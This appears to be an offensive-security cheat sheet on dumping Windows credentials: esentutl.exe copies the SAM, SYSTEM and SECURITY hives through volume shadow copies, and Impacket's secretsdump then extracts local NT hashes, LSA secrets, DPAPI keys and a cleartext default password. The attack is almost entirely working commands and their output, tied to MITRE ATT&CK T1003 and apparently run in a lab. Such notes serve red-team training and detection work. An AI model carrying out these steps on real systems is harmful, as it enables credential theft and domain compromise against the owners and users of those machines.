==================================================================================================================================
OS Credential Dumping (Registry) using 'Esentutl' (Extensible Storage Engine Utilities for Microsoft Windows)
==================================================================================================================================

Our objective is to:
- extract the password hashes of the local accounts stored in the registry hive HKLM\SAM 
  (the syskey to decrypt the registry hive HKLM\SAM is stored in the registry hive HKLM\SYSTEM)
- extract LSA secrets from registry (HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets)
- extract the cached password hashes (of domain accounts that logged on the Windows computer) stored in the registry hive HKLM\SECURITY 

A valid local or domain Windows account member of the 'local administrator' group is required copy the registry hives SAM/SYSTEM/SECURITY.

Usefull links: 
> https://attack.mitre.org/techniques/T1003/002/
> https://attack.mitre.org/techniques/T1003/004/
> https://attack.mitre.org/techniques/T1003/005/

The Extensible Storage Engine Utilities for Microsoft Windows (esentutl.exe) can be used to dump the Windows registry hives 
(SAM/SYSTEM/SECURITY).


==================================================================================================================================
Example 1. Use Esentutl.exe to dump the Windows Windows registry hives (SAM/SYSTEM/SECURITY) and then extract the Windows password
           hashes, cached passwords and LSA secrets from the copied registry hives using Secretsdump
==================================================================================================================================

-------------------------------------------------------------------------------------------
Step 1 - Use Esentutl.exe to dump the Windows Windows registry hives (SAM/SYSTEM/SECURITY) 
-------------------------------------------------------------------------------------------

C:\Users\Administrator\Documents>esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam

Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initializing VSS subsystem...

Initiating COPY FILE mode...
     Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32
Destination File: c:\temp\sam

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

        Total bytes read                = 0x20000 (131072) (0 MB)
        Total bytes written             = 0x20000 (131072) (0 MB)

Operation completed successfully in 6.407 seconds.


C:\Users\Administrator.PO718687\Documents>esentutl.exe /y /vss C:\Windows\System32\config\SYSTEM /d c:\temp\system

Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initializing VSS subsystem...

Initiating COPY FILE mode...
     Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy9\Windows\System32
Destination File: c:\temp\SYSTEM

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

        Total bytes read                = 0x2780000 (41418752) (39 MB)
        Total bytes written             = 0x2780000 (41418752) (39 MB)

Operation completed successfully in 5.578 seconds.


C:\Users\Administrator\Documents> esentutl.exe /y /vss C:\Windows\System32\config\SECURITY /d c:\temp\security

Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initializing VSS subsystem...

Initiating COPY FILE mode...
     Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\Windows\System32
Destination File: c:\temp\security

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

        Total bytes read                = 0x20000 (131072) (0 MB)
        Total bytes written             = 0x20000 (131072) (0 MB)

Operation completed successfully in 5.156 seconds.


C:\Users\Administrator\Documents>dir C:\temp
 Volume in drive C is Windows
 Volume Serial Number is 9C9C-7212

 Directory of C:\temp

03/01/2023  18:29    <DIR>          .
03/01/2023  18:29    <DIR>          ..
03/01/2023  18:22           131,072 sam
03/01/2023  18:28           131,072 security
03/01/2023  18:29        41,418,752 system
               3 File(s)     41,680,896 bytes
               2 Dir(s)  92,411,600,896 bytes free


-----------------------------------------------------------------------------------------------------------------------------
Step 2 - Download the copied files on a Kali VM & then extract the credentials with the tool Secretsdump 
-----------------------------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/CTFs/BadBlood$ secretsdump.py -sam ./sam.hive -security ./security.hive -system ./system.hive LOCAL

Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x941140bd825386b732031d5c5b01ae8a

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1d6fcbd306077d663e23<SNIP>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0<SNIP>

[*] Dumping cached domain logon information (domain/username:hash)

[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:5ea4362d9395d858877c59ddf0cc0d2ae4961b4f<SNIP>
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:540ddc43f8c664881760a1259<SNIP>

[*] DefaultPassword 
(Unknown User):ROOT#123

[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3bef35d8b9ddf267aac8ed41ce41c1a9d9d59382
dpapi_userkey:0x931d191734e96d32cab6f3a0950e0d30204b5377
[*] NL$KM 
 0000   08 26 6A A5 52 EB F1 C3  BF 0E 76 5C B4 C9 C8 1A   .&j.R.....v\....
 0010   E7 57 D5 64 4D 75 CD 0E  41 64 D3 00 B7 B7 F2 DA   .W.dMu..Ad......
 0020   77 1C 3B E0 F5 7E B1 FF  2C 9B 8D 8B 6A 8A 8D 0A   w.;..~..,...j...
 0030   E2 46 DA 0D CA E7 A7 AE  79 B1 35 19 7E D1 E7 F2   .F......y.5.~...
NL$KM:08266aa552ebf1c3bf0e765cb4c9c81ae757d5644d75cd0e4164d300b7b7f2da771c3be0f57eb1ff2c9b8d8b6a8a8d0ae246da0dcae7<SNIP>
[*] Cleaning up... 
